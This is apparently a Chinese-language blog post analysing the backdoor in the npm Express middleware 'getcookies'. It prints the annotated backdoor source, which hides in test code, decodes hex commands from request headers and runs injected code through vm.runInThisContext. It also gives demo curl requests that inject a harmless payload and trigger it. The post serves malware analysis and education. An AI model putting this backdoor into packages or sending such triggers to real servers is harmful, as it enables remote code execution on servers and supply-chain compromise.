前段时间 Express 中的一个中间件 getcookies 被爆出存在 backdoor,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下,了解了黑客具体的作案手段。文中的代码可以在 drafts/getcookies 中查找。

后门代码分析

这个后门代码找得也不容易,因为在被爆出后门后,npm 团队第一时间就删除下架了,github 上的仓库也没找到,不过不负有心人,在 npm.runkit 中找到了后门源码。

  • 黑客巧妙地把 backdoor 代码伪装成测试代码放在 test 目录中,并在 index.js “不经意” 引入了测试代码
  • 主要的 require('vm')['runInThisContext'] 代码被编码故意伪装了一下
  • 全程使用 16 进制,让不想细看的人以为是测试代码
// 分配一块 64K 的内存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);

// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
    // 以 0xfffe 命令为样例
    // 将字符串 feff 读入 Buffer
    // 'feff' => <Buffer fe ff>
    // readUInt16LE 读取 16 bit(位) 并以 byte(字节) 反向排序
    // <Buffer fe ff> => 0xfffe
    //
    // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
    // true
    // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
    // '90785634'
    p = Buffer.from(p, 'hex').readUInt16LE(0);
    switch (p) {

        case 0xfffe:
            module.exports.log = Buffer.alloc(0xffff);
            return;
        case 0xfffa:
            return setTimeout(() => {

                // 去除末尾的 0x00
                let c = module.exports.log.toString().replace(/\x00*$/, '');
                module.exports.log = Buffer.alloc(0xffff);

                // 不能以 0x00 开头
                if (c.indexOf('\x00') < 0) {
                    // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                    // 代码必须是个函数
                    require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                }
                next();
            }, 1000);
        default:
            // 我们以 (function(){console.log('hack')}) 为例
            v = Buffer.from(v, 'hex');
            for (let i = 0; i < v.length; i++) {

                // 因为执行命令的时候,不能以 0x00 开头
                // 所以,p 必须是 0x0000
                module.exports.log[p + i] = v[i];
            }
    }
});

测试一下后门

写一个 express 应用,并将中间件引入进来

var express = require('express')
var app = express()

var getcookies = require('..');

app.use(getcookies);
app.get('/', function (req, res) {
  res.send('Hello World')
})

app.listen(3000)

启动并执行我们的后门代码

$ node demo/index.js
// 向服务器注入 16 进制代码 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
// 向服务器发送执行命令
$ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000

注意,中途出现的 hack 就是被注入代码的输出。

References